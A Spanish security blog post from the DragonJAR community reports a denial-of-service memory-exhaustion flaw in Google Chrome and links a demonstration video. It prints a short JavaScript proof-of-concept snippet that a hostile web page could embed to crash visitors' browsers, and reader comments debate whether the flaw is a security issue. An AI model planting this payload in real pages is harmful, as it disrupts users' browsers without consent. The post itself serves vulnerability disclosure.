Video demostrativo de Memory Exhaustion en Google Chrome

Exploiting Video demostrativo de Memory Exhaustion en Google Chrome

Una vez más el navegador desarrollado por Google, conocido como Chrome, presenta una vulnerabilidad facilmente explotable, esta vez se trata de Memory Exhaustation desde un servidor web remoto, provocando así una denegación de servicio.

logosmdd8 Video demostrativo de Memory Exhaustion en Google Chrome

Esta vulnerabilidad puede ser fácilmente explotada por un usuario malicioso que publique en su página web el siguiente código:

<script language=”javascript”>
window.open(“\r\n\r\n”);
window.refresh();
window.open(“\r\n\r\n”);
</script>

Y esta web sea visitada utilizando .

El equipo de SecNiche Security son los responsables de este descubrimiento, y ofrecen una web como prueba de concepto

exactlimon, usuario de la comunidad y quién nos ha informado de esta noticia, se ha tomado la tarea de realizar un video demostrativo de la explotación de esta vulnerabilidad.

Descargar video demostrativo de Memory Exhaustation en Google Chrome

Articulo escrito por David Moreno (4v4t4r) para La Comunidad DragonJAR

David Moreno es Information Security Researcher con 10 años de experiencia en temáticas relacionadas con la Seguridad de la Información, Informática Forense, Ethical Hacking, Criptoanálisis y Análisis de Malware. Conferencista permanente en eventos nacionales e internacionales de seguridad informática

Es investigador especializado en la compañía DEFERO, donde realiza procedimientos avanzados en Test de Penetración, Identificación y Análisis de Vulnerabilidades, Investigaciones Forenses Digitales en conjunto con entidades del gobierno, analista de Malware y Criptoanálisis.


Si te ha gustado el post, compartelo y ayudanos a crecer.

Unete a nuestra Fanpage Siguenos en Twitter

Autor: Colaborador

La cuenta colaborar agrupa a todas las personas que des interesadamente han colaborado añadiendo contenidos de seguridad informática a La Comunidad DragonJAR y ayudando a la difundir más estas temáticas en nuestro idioma. si deseas ser un colaborador envía un mail a contacto (arroba) dragonjar.org y manda tu material.

Compartir este Artículo
  • Aclarando

    ¿No se trataría más bien de un BUG en lugar de una VULNERABILIDAD?. Según la noticia, este FALLO no supone ningún riesgo en la seguridad.

  • http://birneuhost.com Echelion

    provocando así una denegación de servicio.

    Eso no es un fallo de seguridad?